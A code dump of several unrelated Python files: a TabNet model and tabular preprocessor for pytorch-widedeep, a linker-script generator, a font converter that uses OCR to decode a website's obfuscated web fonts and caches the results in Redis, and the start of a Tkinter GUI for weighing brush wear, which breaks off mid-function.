attn_transformer = AttentiveTransformer(
attn_dim, input_dim, mask_type, **params
)
self.feat_transformers.append(feat_transformer)
self.attn_transformers.append(attn_transformer)
def forward(self, X: Tensor) -> Tuple[List[Tensor], Tensor]:
x = self.initial_bn(X)
# P[n_step = 0] is initialized as all ones, 1^(B×D)
prior = torch.ones(x.shape).to(x.device)
# sparsity regularization
M_loss = torch.FloatTensor([0.0]).to(x.device)
# split block
attn = self.initial_splitter(x)[:, self.step_dim :]
steps_output = []
for step in range(self.n_steps):
# learnable mask: M[i] = sparsemax(prior[i − 1] · hi(a[i − 1]))
# where hi = FC + BN
M = self.attn_transformers[step](prior, attn)
# update prior: P[i] = \prod_{i}^{j=1} (γ − M[j])
prior = torch.mul(self.gamma - M, prior)
# sparsity regularization
M_loss += torch.mean(
torch.sum(torch.mul(M, torch.log(M + self.epsilon)), dim=1)
)
# update attention and d_out
masked_x = torch.mul(M, x)
out = self.feat_transformers[step](masked_x)
attn = out[:, self.step_dim :]
d_out = nn.ReLU()(out[:, : self.step_dim])
steps_output.append(d_out)
M_loss /= self.n_steps # type: ignore[has-type]
return steps_output, M_loss
def forward_masks(self, X: Tensor) -> Tuple[Tensor, Dict[int, Tensor]]:
x = self.initial_bn(X)
prior = torch.ones(x.shape).to(x.device)
M_explain = torch.zeros(x.shape).to(x.device)
attn = self.initial_splitter(x)[:, self.step_dim :]
masks = {}
for step in range(self.n_steps):
M = self.attn_transformers[step](prior, attn)
masks[step] = M
prior = torch.mul(self.gamma - M, prior)
masked_x = torch.mul(M, x)
out = self.feat_transformers[step](masked_x)
attn = out[:, self.step_dim :]
# 'decision contribution' in the paper
d_out = nn.ReLU()(out[:, : self.step_dim])
# aggregate decision contribution
agg_decision_contrib = torch.sum(d_out, dim=1)
M_explain += torch.mul(M, agg_decision_contrib.unsqueeze(dim=1))
return M_explain, masks
class EmbeddingsAndContinuous(nn.Module):
def __init__(
self,
column_idx: Dict[str, int],
embed_input: List[Tuple[str, int, int]],
embed_dropout: float,
continuous_cols: Optional[List[str]],
batchnorm_cont: bool,
):
super(EmbeddingsAndContinuous, self).__init__()
self.column_idx = column_idx
self.embed_input = embed_input
self.continuous_cols = continuous_cols
self.batchnorm_cont = batchnorm_cont
# Embeddings: val + 1 because 0 is reserved for padding/unseen cateogories.
self.embed_layers = nn.ModuleDict(
{
"emb_layer_" + col: nn.Embedding(val + 1, dim, padding_idx=0)
for col, val, dim in self.embed_input
}
)
self.embedding_dropout = nn.Dropout(embed_dropout)
emb_out_dim = np.sum([embed[2] for embed in self.embed_input])
# Continuous
if self.continuous_cols is not None:
cont_out_dim = len(self.continuous_cols)
if self.batchnorm_cont:
self.norm = nn.BatchNorm1d(cont_out_dim)
else:
cont_out_dim = 0
self.output_dim: int = emb_out_dim + cont_out_dim # type: ignore[assignment]
def forward(self, X: Tensor) -> Tensor:
embed = [
self.embed_layers["emb_layer_" + col](X[:, self.column_idx[col]].long())
for col, _, _ in self.embed_input
]
x = torch.cat(embed, 1)
x = self.embedding_dropout(x)
if self.continuous_cols is not None:
cont_idx = [self.column_idx[col] for col in self.continuous_cols]
x_cont = X[:, cont_idx].float()
if self.batchnorm_cont:
x_cont = self.norm(x_cont)
x = torch.cat([x, x_cont], 1) if self.embed_input is not None else x_cont
return x
class TabNet(nn.Module):
r"""TabNet model (https://arxiv.org/abs/1908.07442) model that can be used
as the deeptabular component of a Wide & Deep model.
The implementation in this library is fully based on that here:
https://github.com/dreamquark-ai/tabnet, simply adapted so that it can
work within the ``WideDeep`` frame. Therefore, **all credit to the
dreamquark-ai team**
Parameters
----------
column_idx: Dict
Dictionary where the keys are the columns and the values their
corresponding index
embed_input: List
List of Tuples with the column name, number of unique values and
embedding dimension. e.g. [(education, 11, 32), ...]
embed_dropout: float, default = 0.
embeddings dropout
continuous_cols: List, Optional, default = None
List with the name of the numeric (aka continuous) columns
batchnorm_cont: bool, default = False
Boolean indicating whether or not to apply batch normalization to the
continuous input
n_steps: int, default = 3
number of decision steps
step_dim: int, default = 8
Step's output dimension. This is the output dimension that
``WideDeep`` will collect and connect to the output neuron(s). For
a better understanding of the function of this and the upcoming
parameters, please see the `paper
<https://arxiv.org/abs/1908.07442>`_.
attn_dim: int, default = 8
Attention dimension
dropout: float, default = 0.0
GLU block 'internal' dropout
n_glu_step_dependent: int, default = 2
number of GLU Blocks [FC -> BN -> GLU] that are step dependent
n_glu_shared: int, default = 2
number of GLU Blocks [FC -> BN -> GLU] that will be shared
across decision steps
ghost_bn: bool, default=True
Boolean indicating if `Ghost Batch Normalization
<https://arxiv.org/abs/1705.08741>`_ will be used.
virtual_batch_size: int, default = 128
Batch size when using Ghost Batch Normalization
momentum: float, default = 0.02
Ghost Batch Normalization's momentum. The dreamquark-ai advises for
very low values. The results in the paper use significantly higher
values. Higher values lead to better results in my experimentations
gamma: float, default = 1.3
Relaxation parameter in the paper. When gamma = 1, a feature is
enforced to be used only at one decision step and as gamma
increases, more flexibility is provided to use a feature at
multiple decision steps
epsilon: float, default = 1e-15
Float to avoid log(0). Always keep low
mask_type: str, default = "sparsemax"
Mask function to use. Either "sparsemax" or "entmax"
Attributes
----------
embed_and_cont: ``nn.ModuleDict``
``ModuleDict`` with the embeddings and continuous setup
embed_and_cont_dim: int
embeddings plus continuous dimension
output_dim: int
The output dimension of the model. This is a required attribute
neccesary to build the WideDeep class
tabnet_encoder: ``nn.Module``
``Module`` containing the TabNet encoder. See the `paper
<https://arxiv.org/abs/1908.07442>`_.
Example
--------
>>> import torch
>>> from pytorch_widedeep.models import TabNet
>>> X_tab = torch.cat((torch.empty(5, 4).random_(4), torch.rand(5, 1)), axis=1)
>>> colnames = ['a', 'b', 'c', 'd', 'e']
>>> embed_input = [(u,i,j) for u,i,j in zip(colnames[:4], [4]*4, [8]*4)]
>>> column_idx = {k:v for v,k in enumerate(colnames)}
>>> model = TabNet(column_idx=column_idx, embed_input=embed_input, continuous_cols = ['e'])
"""
def __init__(
self,
column_idx: Dict[str, int],
embed_input: List[Tuple[str, int, int]],
embed_dropout: float = 0.0,
continuous_cols: Optional[List[str]] = None,
batchnorm_cont: bool = False,
n_steps: int = 3,
step_dim: int = 8,
attn_dim: int = 8,
dropout: float = 0.0,
n_glu_step_dependent: int = 2,
n_glu_shared: int = 2,
ghost_bn: bool = True,
virtual_batch_size: int = 128,
momentum: float = 0.02,
gamma: float = 1.3,
epsilon: float = 1e-15,
mask_type: str = "sparsemax",
):
super(TabNet, self).__init__()
self.column_idx = column_idx
self.embed_input = embed_input
self.embed_dropout = embed_dropout
self.continuous_cols = continuous_cols
self.batchnorm_cont = batchnorm_cont
self.n_steps = n_steps
self.step_dim = step_dim
self.attn_dim = attn_dim
self.dropout = dropout
self.n_glu_step_dependent = n_glu_step_dependent
self.n_glu_shared = n_glu_shared
self.ghost_bn = ghost_bn
self.virtual_batch_size = virtual_batch_size
self.momentum = momentum
self.gamma = gamma
self.epsilon = epsilon
self.mask_type = mask_type
self.embed_and_cont = EmbeddingsAndContinuous(
column_idx, embed_input, embed_dropout, continuous_cols, batchnorm_cont
)
self.embed_and_cont_dim = self.embed_and_cont.output_dim
self.tabnet_encoder = TabNetEncoder(
self.embed_and_cont.output_dim,
n_steps,
step_dim,
attn_dim,
dropout,
n_glu_step_dependent,
n_glu_shared,
ghost_bn,
virtual_batch_size,
momentum,
gamma,
epsilon,
mask_type,
)
self.output_dim = step_dim
def forward(self, X: Tensor) -> Tuple[Tensor, Tensor]:
x = self.embed_and_cont(X)
steps_output, M_loss = self.tabnet_encoder(x)
res = torch.sum(torch.stack(steps_output, dim=0), dim=0)
return (res, M_loss)
def forward_masks(self, X: Tensor) -> Tuple[Tensor, Dict[int, Tensor]]:
x = self.embed_and_cont(X)
return self.tabnet_encoder.forward_masks(x)
class TabNetPredLayer(nn.Module):
def __init__(self, inp, out):
r"""This class is a 'hack' required because TabNet is a very particular
model within ``WideDeep``.
TabNet's forward method within ``WideDeep`` outputs two tensors, one
with the last layer's activations and the sparse regularization
factor. Since the output needs to be collected by ``WideDeep`` to then
Sequentially build the output layer (connection to the output
neuron(s)) I need to code a custom TabNetPredLayer that accepts two
inputs. This will be used by the ``WideDeep`` class.
"""
super(TabNetPredLayer, self).__init__()
self.pred_layer = nn.Linear(inp, out, bias=False)
initialize_non_glu(self.pred_layer, inp, out)
def forward(self, tabnet_tuple: Tuple[Tensor, Tensor]) -> Tuple[Tensor, Tensor]:
res, M_loss = tabnet_tuple[0], tabnet_tuple[1]
return self.pred_layer(res), M_loss
```
#### File: models/tabnet/tab_net_utils.py
```python
import numpy as np
from scipy.sparse import csc_matrix
from pytorch_widedeep.wdtypes import WideDeep
def create_explain_matrix(model: WideDeep) -> csc_matrix:
"""
Returns a sparse matrix used to compute the feature importances after
training
Parameters
----------
model: WideDeep
object of type ``WideDeep``
Examples
--------
>>> from pytorch_widedeep.models import TabNet, WideDeep
>>> from pytorch_widedeep.models.tabnet.tab_net_utils import create_explain_matrix
>>> embed_input = [("a", 4, 2), ("b", 4, 2), ("c", 4, 2)]
>>> cont_cols = ["d", "e"]
>>> column_idx = {k: v for v, k in enumerate(["a", "b", "c", "d", "e"])}
>>> deeptabular = TabNet(column_idx=column_idx, embed_input=embed_input, continuous_cols=cont_cols)
>>> model = WideDeep(deeptabular=deeptabular)
>>> reduce_mtx = create_explain_matrix(model)
>>> reduce_mtx.todense()
matrix([[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.]])
"""
(
embed_input,
column_idx,
embed_and_cont_dim,
) = _extract_tabnet_params(model)
n_feat = len(column_idx)
col_embeds = {e[0]: e[2] - 1 for e in embed_input}
embed_colname = [e[0] for e in embed_input]
cont_colname = [c for c in column_idx.keys() if c not in embed_colname]
embed_cum_counter = 0
indices_trick = []
for colname, idx in column_idx.items():
if colname in cont_colname:
indices_trick.append([idx + embed_cum_counter])
elif colname in embed_colname:
indices_trick.append(
range( # type: ignore[arg-type]
idx + embed_cum_counter,
idx + embed_cum_counter + col_embeds[colname] + 1,
)
)
embed_cum_counter += col_embeds[colname]
reducing_matrix = np.zeros((embed_and_cont_dim, n_feat))
for i, cols in enumerate(indices_trick):
reducing_matrix[cols, i] = 1
return csc_matrix(reducing_matrix)
def _extract_tabnet_params(model: WideDeep):
tabnet_backbone = list(model.deeptabular.children())[0]
column_idx = tabnet_backbone.column_idx
embed_input = tabnet_backbone.embed_input
embed_and_cont_dim = tabnet_backbone.embed_and_cont_dim
return embed_input, column_idx, embed_and_cont_dim
```
#### File: pytorch_widedeep/preprocessing/tab_preprocessor.py
```python
import warnings
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
from pytorch_widedeep.wdtypes import * # noqa: F403
from pytorch_widedeep.utils.deeptabular_utils import LabelEncoder
from pytorch_widedeep.preprocessing.base_preprocessor import (
BasePreprocessor,
check_is_fitted,
)
def embed_sz_rule(n_cat):
r"""Rule of thumb to pick embedding size corresponding to ``n_cat``. Taken
from fastai's Tabular API"""
return min(600, round(1.6 * n_cat ** 0.56))
class TabPreprocessor(BasePreprocessor):
r"""Preprocessor to prepare the ``deeptabular`` component input dataset
Parameters
----------
embed_cols: List, default = None
List containing the name of the columns that will be represented by
embeddings or a Tuple with the name and the embedding dimension. e.g.:
[('education',32), ('relationship',16), ...]
continuous_cols: List, default = None
List with the name of the so called continuous cols
scale: bool, default = True
Bool indicating whether or not to scale/standarise continuous
cols. The user should bear in mind that all the ``deeptabular``
components available within ``pytorch-widedeep`` they also include
the possibility of normalising the input continuous features via a
``BatchNorm`` or a ``LayerNorm`` layer. see
:class:`pytorch_widedeep.models`
auto_embed_dim: bool, default = True
Boolean indicating whether the embedding dimensions will be
automatically defined via fastai's rule of thumb':
:math:`min(600, int(1.6 \times n_{cat}^{0.56}))`
default_embed_dim: int, default=16
Dimension for the embeddings used for the ``deeptabular``
component if the embed_dim is not provided in the ``embed_cols``
parameter
already_standard: List, default = None
List with the name of the continuous cols that do not need to be
Standarised. For example, you might have Long and Lat in your
dataset and might want to encode them somehow (e.g. see the
``LatLongScalarEnc`` available in the `autogluon
<https://github.com/awslabs/autogluon/tree/master/tabular/src/autogluon/tabular>`_
tabular library) and not standarize them any further
for_tabtransformer: bool, default = False
Boolean indicating whether the preprocessed data will be passed to
a ``TabTransformer`` model. If ``True``, the param ``embed_cols``
must just be a list containing the categorical columns: e.g.:
['education', 'relationship', ...] This is because following the
results in the `paper <https://arxiv.org/pdf/2012.06678.pdf>`_,
they will all be encoded using embeddings of the same dim (32 by
default). See
:class:`pytorch_widedeep.models.tab_transformer.TabTransformer`
verbose: int, default = 1
Attributes
----------
embed_dim: Dict
Dictionary where keys are the embed cols and values are the embedding
dimensions. If ``for_tabtransformer`` is set to ``True`` the embedding
dimensions are the same for all columns and this attributes is not
generated during the ``fit`` process
label_encoder: LabelEncoder
see :class:`pytorch_widedeep.utils.dense_utils.LabelEncder`
embeddings_input: List
List of Tuples with the column name, number of individual values for
that column and the corresponding embeddings dim, e.g. [
('education', 16, 10), ('relationship', 6, 8), ...]
standardize_cols: List
List of the columns that will be standarized
scaler: StandardScaler
an instance of :class:`sklearn.preprocessing.StandardScaler`
column_idx: Dict
Dictionary where keys are column names and values are column indexes.
This is be neccesary to slice tensors
Examples
--------
>>> import pandas as pd
>>> from pytorch_widedeep.preprocessing import TabPreprocessor
>>> df = pd.DataFrame({'color': ['r', 'b', 'g'], 'size': ['s', 'n', 'l'], 'age': [25, 40, 55]})
>>> embed_cols = [('color',5), ('size',5)]
>>> cont_cols = ['age']
>>> deep_preprocessor = TabPreprocessor(embed_cols=embed_cols, continuous_cols=cont_cols)
>>> deep_preprocessor.fit_transform(df)
array([[ 1. , 1. , -1.22474487],
[ 2. , 2. , 0. ],
[ 3. , 3. , 1.22474487]])
>>> deep_preprocessor.embed_dim
{'color': 5, 'size': 5}
>>> deep_preprocessor.column_idx
{'color': 0, 'size': 1, 'age': 2}
"""
def __init__(
self,
embed_cols: Union[List[str], List[Tuple[str, int]]] = None,
continuous_cols: List[str] = None,
scale: bool = True,
auto_embed_dim: bool = True,
default_embed_dim: int = 16,
already_standard: List[str] = None,
for_tabtransformer: bool = False,
verbose: int = 1,
):
super(TabPreprocessor, self).__init__()
self.embed_cols = embed_cols
self.continuous_cols = continuous_cols
self.scale = scale
self.auto_embed_dim = auto_embed_dim
self.default_embed_dim = default_embed_dim
self.already_standard = already_standard
self.for_tabtransformer = for_tabtransformer
self.verbose = verbose
self.is_fitted = False
if (self.embed_cols is None) and (self.continuous_cols is None):
raise ValueError(
"'embed_cols' and 'continuous_cols' are 'None'. Please, define at least one of the two."
)
tabtransformer_error_message = (
"If for_tabtransformer is 'True' embed_cols must be a list "
" of strings with the columns to be encoded as embeddings."
)
if self.for_tabtransformer and self.embed_cols is None:
raise ValueError(tabtransformer_error_message)
if self.for_tabtransformer and isinstance(self.embed_cols[0], tuple): # type: ignore[index]
raise ValueError(tabtransformer_error_message)
if self.for_tabtransformer and self.scale:
warnings.warn(
"Both 'for_tabtransformer' and 'scale' are set to True. "
"This implies that the continuous columns will be "
"standarized and then passed through a LayerNorm layer",
UserWarning,
)
def fit(self, df: pd.DataFrame) -> BasePreprocessor:
"""Fits the Preprocessor and creates required attributes"""
if self.embed_cols is not None:
df_emb = self._prepare_embed(df)
self.label_encoder = LabelEncoder(df_emb.columns.tolist()).fit(df_emb)
self.embeddings_input: List = []
for k, v in self.label_encoder.encoding_dict.items():
if self.for_tabtransformer:
self.embeddings_input.append((k, len(v)))
else:
self.embeddings_input.append((k, len(v), self.embed_dim[k]))
if self.continuous_cols is not None:
df_cont = self._prepare_continuous(df)
if self.scale:
df_std = df_cont[self.standardize_cols]
self.scaler = StandardScaler().fit(df_std.values)
elif self.verbose:
warnings.warn("Continuous columns will not be normalised")
self.is_fitted = True
return self
def transform(self, df: pd.DataFrame) -> np.ndarray:
"""Returns the processed ``dataframe`` as a np.ndarray"""
check_is_fitted(self, condition=self.is_fitted)
if self.embed_cols is not None:
df_emb = self._prepare_embed(df)
df_emb = self.label_encoder.transform(df_emb)
if self.continuous_cols is not None:
df_cont = self._prepare_continuous(df)
if self.scale:
df_std = df_cont[self.standardize_cols]
df_cont[self.standardize_cols] = self.scaler.transform(df_std.values)
try:
df_deep = pd.concat([df_emb, df_cont], axis=1)
except NameError:
try:
df_deep = df_emb.copy()
except NameError:
df_deep = df_cont.copy()
self.column_idx = {k: v for v, k in enumerate(df_deep.columns)}
return df_deep.values
def inverse_transform(self, encoded: np.ndarray) -> pd.DataFrame:
r"""Takes as input the output from the ``transform`` method and it will
return the original values.
Parameters
----------
encoded: np.ndarray
array with the output of the ``transform`` method
"""
decoded = pd.DataFrame(encoded, columns=self.column_idx.keys())
# embeddings back to original category
if self.embed_cols is not None:
if isinstance(self.embed_cols[0], tuple):
emb_c: List = [c[0] for c in self.embed_cols]
else:
emb_c = self.embed_cols.copy()
for c in emb_c:
decoded[c] = decoded[c].map(self.label_encoder.inverse_encoding_dict[c])
# continuous_cols back to non-standarised
try:
decoded[self.continuous_cols] = self.scaler.inverse_transform(
decoded[self.continuous_cols]
)
except AttributeError:
pass
return decoded
def fit_transform(self, df: pd.DataFrame) -> np.ndarray:
"""Combines ``fit`` and ``transform``"""
return self.fit(df).transform(df)
def _prepare_embed(self, df: pd.DataFrame) -> pd.DataFrame:
if self.for_tabtransformer:
return df.copy()[self.embed_cols]
else:
if isinstance(self.embed_cols[0], tuple):
self.embed_dim = dict(self.embed_cols) # type: ignore
embed_colname = [emb[0] for emb in self.embed_cols]
elif self.auto_embed_dim:
n_cats = {col: df[col].nunique() for col in self.embed_cols}
self.embed_dim = {col: embed_sz_rule(n_cat) for col, n_cat in n_cats.items()} # type: ignore[misc]
embed_colname = self.embed_cols # type: ignore
else:
self.embed_dim = {e: self.default_embed_dim for e in self.embed_cols} # type: ignore
embed_colname = self.embed_cols # type: ignore
return df.copy()[embed_colname]
def _prepare_continuous(self, df: pd.DataFrame) -> pd.DataFrame:
if self.scale:
if self.already_standard is not None:
self.standardize_cols = [
c for c in self.continuous_cols if c not in self.already_standard
]
else:
self.standardize_cols = self.continuous_cols
return df.copy()[self.continuous_cols]
``` |
{
"source": "5uso/skyline",
"score": 2
} |
#### File: skyline/scripts/common.py
```python
HPP_NAMESPACE = "KingSymbols150"
# Mangle for extern void cleanName()
def mangleFunctionName(cleanName):
return "_ZN" + str(len(HPP_NAMESPACE)) + HPP_NAMESPACE + str(len(cleanName)) + cleanName + "Ev"
# Mangle for extern void* cleanName;
def mangleDataName(cleanName):
return "_ZN" + str(len(HPP_NAMESPACE)) + HPP_NAMESPACE + str(len(cleanName)) + cleanName + "E"
```
#### File: skyline/scripts/genLinkerScript.py
```python
import os, csv, sys
from common import mangleDataName, mangleFunctionName
# consts
CUSTOM_HEADER = """
/*
* This is a generated file
* DO NOT EDIT THIS FILE DIRECTLY
* Generate with genLinkerScript.py instead
*/
"""
# The paths to search for LinkerHints
INCLUDE = ["include", "linkerscripts"]
# The extensions of files
EXTENSIONS = [".h", ".hpp", ".links"]
# Search strings
DISABLED = "Disabled"
LINKER_HINTS = "Links"
# Offset for symbols in main (beginning of skyline - beginning of main)
MAIN_OFFSET = "0x2d91000"
# Namespace for the generated header
HPP_NAMESPACE = "KingSymbols150"
# Prefix function name
FUNC_PREFIX = "f_"
# Prefix Data symbols
DATA_PREFIX = "d_"
FUNC_ALIAS = f"{HPP_NAMESPACE}::{FUNC_PREFIX}"
DATA_ALIAS = f"{HPP_NAMESPACE}::{DATA_PREFIX}"
LD_OUTPUT = "linkerscripts/syms150.ld"
def createLinkerScriptLine(addrStr, mangledName, comment):
commentStr = ""
if comment != None:
commentStr = f"/* {comment} */"
return f"{mangledName} = {addrStr} - {MAIN_OFFSET}; {commentStr}\n"
# If line is just comment, return comment, otherwise return None
def parseLine(rawLine):
if rawLine.startswith("//"):
return rawLine[2:].strip()
elif rawLine.startswith("/*") and rawLine.endswith("*/"):
return rawLine[2:len(rawLine)-2].strip()
else:
return None
def extractComments(line):
parenStart = line.find("(")
parenEnd = line.find(")")
comment = None
if parenEnd > parenStart and parenEnd != -1:
comment = line[parenStart+1:parenEnd]
line = line[:parenStart]
return line, comment
def scanFileForLinkerHints(ldAddrData, ldSymbData, pathStr, headerFile):
headerLines = headerFile.readlines()
savedLines = ""
for line in headerLines:
lineStripped = line.strip()
# Process multi line
if lineStripped.endswith("\\"):
savedLines += lineStripped[:-1]
continue
lineStripped = savedLines + lineStripped
savedLines = ""
lineContent = parseLine(lineStripped) # Part of the line without comment symbols
if lineContent == None:
continue
lineContent, comment = extractComments(lineContent)
parts = lineContent.split()
if len(parts) >= 3 and parts[0] == LINKER_HINTS:
addrStr = parts[1]
mangledName = parts[2]
# addrStr can be another symbol
if not addrStr.startswith("0x"):
# Add to symbdata to resolve later
ldSymbData.append((addrStr, mangledName, comment, pathStr))
else:
ldAddrData[addrStr] = (mangledName, comment)
def scanPathForLinkerHints(ldAddrData, ldSymbData, pathStr):
if os.path.isfile(pathStr):
if os.path.splitext(pathStr)[1] in EXTENSIONS:
with open(pathStr) as headerFile:
scanFileForLinkerHints(ldAddrData, ldSymbData, pathStr, headerFile)
elif os.path.isdir(pathStr):
print("Scanning", pathStr)
dirContent = os.listdir(pathStr)
for subPathName in dirContent:
scanPathForLinkerHints(ldAddrData, ldSymbData, os.path.join(pathStr, subPathName))
ldLines = []
ldAddrData = {}
ldSymbData = []
for pathStr in INCLUDE:
scanPathForLinkerHints(ldAddrData, ldSymbData, pathStr)
print("Resolving...")
ldSymbolToAddress = {}
addrCount = 0
for addrStr in ldAddrData:
mangledName, comment = ldAddrData[addrStr]
line = createLinkerScriptLine(addrStr, mangledName, comment)
ldSymbolToAddress[mangledName] = addrStr
ldLines.append(line)
addrCount+=1
print("Resolved", addrCount, "links to address")
symbCount = 0
funcCount = 0
dataCount = 0
for symbStr, mangledName, comment, pathStr in ldSymbData:
mangledSymbol = ""
if symbStr.startswith(FUNC_ALIAS):
funcName = symbStr[len(FUNC_ALIAS)-len(FUNC_PREFIX):]
mangledSymbol = mangleFunctionName(funcName)
funcCount+=1
elif symbStr.startswith(DATA_ALIAS):
dataName = symbStr[len(DATA_ALIAS)-len(DATA_PREFIX):]
mangledSymbol = mangleDataName(dataName)
dataCount+=1
else:
mangledSymbol = symbStr
symbCount+=1
if mangledSymbol not in ldSymbolToAddress:
print("Error: Fail to resolve", symbStr, "from", pathStr)
sys.exit(-1)
resolvedAddrStr = ldSymbolToAddress[mangledSymbol]
line = createLinkerScriptLine(resolvedAddrStr, mangledName, comment)
ldLines.append(line)
print("Resolved", symbCount, "links to symbols")
print("Resolved", funcCount, "links to uking functions")
print("Resolved", dataCount, "links to uking data")
# Write ld
print("Writing", LD_OUTPUT)
with open(LD_OUTPUT, "w+") as ldFile:
ldFile.write(f"/* {LD_OUTPUT} */\n")
ldFile.write(CUSTOM_HEADER)
ldFile.write(f"blank = 0;\n")
ldFile.writelines(ldLines)
print("Written",len(ldLines),"symbol mapping")
``` |
{
"source": "5uw1st/font-converter",
"score": 2
} |
#### File: font-converter/font_converter/converter.py
```python
import logging
import re
from base64 import b64decode, b64encode
from io import BytesIO
import pytesseract
import requests
from PIL import Image, ImageFont, ImageDraw, ImageColor
from .helper import RedisClient, HEADERS
class FontConverter(object):
"""
Font converter
"""
def __init__(self, font_url, logger=None, redis_client=None, debug=False, lang="chi_sim", pool_size=5, **kwargs):
self._font_url = font_url
self._debug = debug
self._lang = lang
self._pool_size = pool_size
self.logger = logger or logging.getLogger()
self._reg_font_sign = re.compile(r'fonts-styles/fonts/\w+/(\w+?)/tyc-num')
self._expire_time = kwargs.get("expire_time") or 30 * 24 * 3600
self._redis_client = redis_client or RedisClient(**kwargs)
self._font_content = None
self._font_key = ""
self._word_key = ""
self._words_dict = {}
self._init_data()
def _init_data(self):
sign = self._get_font_sign(font_url=self._font_url)
self._font_key = self._get_redis_key(sign=sign, key_type="CONTENT") # init key
self._word_key = self._get_redis_key(sign=sign, key_type="WORD")
self._font_content = self._get_font_content()
self.logger.debug("===>Init data, sign:{1}, font_url:{0}".format(self._font_url, sign))
def _get_redis_key(self, sign, key_type="CONTENT"):
"""
获取redis key, eg: FontConverter:CONTENT:5534d7da
:param sign: str font sign
:param key_type: str CONTENT/MAP
:return: str
"""
return ":".join([self.__class__.__name__, key_type, sign])
def _download_font(self, font_url):
"""
获取字体内容
:param font_url: str
:return: font_bytes
"""
return requests.get(font_url, headers=HEADERS, timeout=10).content
def _get_font_sign(self, font_url):
"""
获取字体签名(用于判断是否更新)
:param font_url: str
:return: str
"""
_ret = self._reg_font_sign.search(font_url)
if not _ret:
raise RuntimeError("font url validate:{0}".format(font_url))
return _ret.group(1)
def _get_font_content(self):
"""
获取字体文件内容
:return: bytes
"""
b64_value = self._redis_client.get(self._font_key)
if b64_value:
content = b64decode(b64_value.decode())
else:
content = self._download_font(font_url=self._font_url)
self._save_font_to_redis(key=self._font_key, font_bytes=content)
return content
def _save_font_to_redis(self, key, font_bytes):
"""
保存字体内容
:param key: str
:param font_bytes: bytes
:return: bool
"""
b64 = b64encode(font_bytes)
return self._redis_client.setex(key, self._expire_time, b64)
def _parse_word_from_font(self, word):
img = Image.new("RGB", (300, 300), (255, 255, 255))
draw = ImageDraw.Draw(img)
font = ImageFont.truetype(BytesIO(self._font_content), 200)
draw.text((10, 10), text=word, font=font, fill=ImageColor.getcolor('black', 'RGB'))
if self._debug:
img.show()
if word.isdigit():
ps = "--psm 6 digits"
else:
ps = "--psm 8 -l {0}".format(self._lang)
result = pytesseract.image_to_string(img, config=ps)
if result == "":
return word
else:
return result[0]
def _get_origin_word(self, now_word):
"""
获取原始word
:param now_word: str
:return: dict
"""
origin = self._redis_client.hget(self._word_key, now_word)
if origin is not None:
return origin.decode()
# not existed, need parse
origin_word = self._parse_word_from_font(word=str(now_word))
self._save_word_to_redis(now_word=now_word, origin_word=origin_word)
self.logger.info("===>New word, [{0}]==>[{1}]".format(now_word, origin_word))
return origin_word
def _save_word_to_redis(self, now_word, origin_word):
"""
保存word映射关系
:param now_word: str
:param origin_word: str
:return: bool
"""
self._redis_client.hsetnx(self._word_key, now_word, origin_word)
if self._redis_client.ttl(self._word_key) < 0:
self._redis_client.expire(self._word_key, self._expire_time)
def _do_convert(self, word):
"""
开始转换
:param word:
:return:
"""
if word in self._words_dict.keys():
return self._words_dict[word]
origin = self._get_origin_word(now_word=word)
self._words_dict[word] = origin
return origin
def get_dict(self):
return self._words_dict
def clear(self):
self._redis_client.delete(self._word_key)
self._redis_client.delete(self._font_content)
del self._words_dict
def convert(self, words):
"""
转换字体
:return: str
"""
result = []
for word in words:
# TODO use process pool
result.append(self._do_convert(word=word))
return "".join(result)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def __str__(self):
return "<{0}|{1}>".format(self.__class__.__name__, self._font_url)
```
#### File: font-converter/font_converter/helper.py
```python
import os
import redis
HEADERS = {
"Sec-Fetch-Mode": "cors",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36",
}
class RedisClient(object):
"""
Redis connect client
"""
def __init__(self, redis_uri=None, **kwargs):
self.__conn = None
self.redis_uri = redis_uri or kwargs.get("redis_uri")
if not self.redis_uri:
raise RuntimeError("Must set redis_uri")
def _get_conn(self):
if not self.__conn:
self.__conn = redis.from_url(url=self.redis_uri)
return self.__conn
@property
def conn(self):
return self._get_conn()
def __getattr__(self, item):
return getattr(self.conn, item)
def test(self):
return self.ping()
def get_env(key, default=None):
return os.environ.get(key, default=default)
``` |
{
"source": "5voltsgc/brush_wear",
"score": 3
} |
#### File: 5voltsgc/brush_wear/brush_wear_gui.py
```python
import tkinter as tk
from tkinter import ttk
import serial
# Global Varibles
Number_samples = 3
red_first_time = True
blue_first_time = True
green_first_time = True
green_brush = ['[0] item Number',
'[1] Fiber Count',
'[2] Fiber Radius',
'[3] Start Length',
'[4] Start weight',
'[5] Current weight',
'[6] Diff from Previous weight',
'[7] Current Length'
]
red_brush = ['[0] item Number',
'[1] Fiber Count',
'[2] Fiber Radius',
'[3] Start Length',
'[4] Start weight',
'[5] Current weight',
'[6] Diff from Previous weight',
'[7] Current Length'
]
blue_brush = ['[0] item Number',
'[1] Fiber Count',
'[2] Fiber Radius',
'[3] Start Length',
'[4] Start weight',
'[5] Current weight',
'[6] Diff from Previous weight',
'[7] Current Length'
]
comm_port = "COM29" # this is the comm port the scale is connected to
# Serial Port - Change port to match serial port on computer device manager
# serialPort = serial.Serial(port=comm_port, baudrate=9600,
# bytesize=8, timeout=2, stopbits=serial.STOPBITS_ONE)
# Main Window
window = tk.Tk()
window.resizable(width=False, height=False)
window.title("Bursh Wear Testing - Lathe")
window.geometry('1100x300')
# Seperator objects
separator1 = ttk.Separator(window, orient='vertical')
separator1.place(relx=0.33, rely=0, relwidth=0.2, relheight=1)
separator2 = ttk.Separator(window, orient='vertical')
separator2.place(relx=0.66, rely=0, relwidth=0.2, relheight=1)
def Weight_read():
serialString = "" # Used to hold data coming over UART
try:
serialString = serialPort.readline()
serialString = serialString.decode('Ascii').strip('+').strip()
serialString = serialString[:-1]
return(float(serialString))
except ValueError:
# just return 0 Zero if cant be converted to float, and try again
return(0)
def sample_weight():
average_weight = []
for x in range(Number_samples):
read = Weight_read()
average_weight.append(read)
current_weight = Weight_read()
max_weight = max(average_weight)
min_weight = min(average_weight)
loop_count = 0
